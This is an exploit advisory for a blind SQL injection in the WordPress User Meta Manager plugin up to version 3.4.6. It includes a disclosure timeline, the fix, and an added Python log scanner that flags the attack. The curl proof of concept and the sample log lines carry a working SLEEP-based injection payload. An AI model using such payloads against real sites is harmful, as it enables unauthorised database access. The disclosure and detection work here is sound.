* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
================================================================================

The AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta Manager plugin for WordPress, up to v3.4.6, are vulnerable to blind SQL injection. A registered user can pass arbitrary MySQL commands through the `umm_user` GET param.

PoC
================================================================================

curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"

Timeline
================================================================================

2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums on WordPress.org
2015/12/29 - Vendor notified via contact form on his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7

Solution
================================================================================

Update to version 3.4.7
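As an added defender-side example (not part of the original advisory), the following Python scans web-server access logs for requests matching the vulnerable `admin-ajax.php` pattern described above. It assumes the combined log format, and that `umm_user` is meant to carry a plain numeric WordPress user ID; the sample log lines are constructed, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2016:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=umm_switch_action&umm_sub_action=umm_edit_user_meta&umm_user=42 HTTP/1.1" 200 512
10.0.0.9 - - [04/Feb/2016:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=umm_switch_action&umm_sub_action=umm_delete_user_meta&umm_user=SLEEP(5) HTTP/1.1" 200 17
10.0.0.9 - - [04/Feb/2016:10:00:14 +0000] "GET /wp-admin/admin-ajax.php?action=umm_switch_action&umm_sub_action=umm_edit_user_meta&umm_user=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 17
10.0.0.7 - - [04/Feb/2016:10:00:20 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 88
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# The two sub-actions named in the advisory as reachable via umm_switch_action.
VULN_SUB_ACTIONS = {"umm_edit_user_meta", "umm_delete_user_meta"}
# Assumption: a legitimate umm_user value is a WordPress user ID, i.e. digits only.
USER_ID_RE = re.compile(r"^\d+$")
# Time-based primitives typical of blind SQLi probes (matched case-insensitively).
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark)\b", re.IGNORECASE)


def classify(uri):
    """Return a finding string for a suspicious request URI, or None if benign."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if q.get("action", [""])[0] != "umm_switch_action":
        return None
    sub = q.get("umm_sub_action", [""])[0]
    if sub not in VULN_SUB_ACTIONS:
        return None
    umm_user = q.get("umm_user", [""])[0]
    if USER_ID_RE.match(umm_user):
        return None
    if TIME_BASED_RE.search(umm_user):
        return f"time-based SQLi probe in umm_user ({sub}): {umm_user!r}"
    return f"non-numeric umm_user ({sub}): {umm_user!r}"


def scan(log_text):
    """Yield (client_ip, finding) for every suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify(m.group("uri"))
        if finding:
            findings.append((m.group("ip"), finding))
    return findings
```

Any hit on `umm_user` that is not a plain user ID is worth triage; the time-based ones are the strongest signal for the injection described in this advisory.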